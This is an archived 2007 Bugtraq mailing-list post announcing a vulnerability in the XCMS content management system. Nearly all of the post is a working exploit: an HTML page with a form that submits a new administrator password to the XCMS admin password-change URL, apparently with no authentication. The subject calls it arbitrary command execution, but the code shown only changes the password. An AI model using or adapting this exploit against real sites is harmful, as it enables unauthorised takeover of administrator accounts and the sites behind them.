lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070922101736.4060.qmail@securityfocus.com>
Date: 22 Sep 2007 10:17:36 -0000
From: x0kster@...il.com
To: bugtraq@...urityfocus.com
Subject: xcms all version arbitrary code execution

<!--

 -[ Name     : XCMS Arbitrary Command Execution Vulnerability                 ]-
 -[ Download : http://www.xcms.it/index.php?lng=it&mod=download&pg=indice&c=2 ]-
 -[ Author   : x0kster                                                        ]-
 -[ Email    : x0kster[AT]gmail[DOT]com                                       ]-
 -[ Date     : 20-09-2007                                                     ]-

-->
<html>
<head>
<title>-XCMS Arbitrary Command Execution Vuln by x0kster -</title>
</head>
<body>
<pre>
- [XCMS All Version Arbitrary Command Execution Vulnerability       ] -
- [Bug found by x0kster - x0kster@...il.com                         ] -
</pre>
<form name="pass" method="post" action="http://www.xcms.it/index.php?lng=it&amp;pg=admin&amp;s=cpass">
<input type="hidden" name="pass" value="1190316852" />
<pre>
Password        : <input type="password" size="20" name="password_1190316852" />
Repete password : <input type="password" size="20" name="rpassword_1190316852" />
                  <input type="submit" value="Modifica Password" />
</pre>
</form>
</body>
</html>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ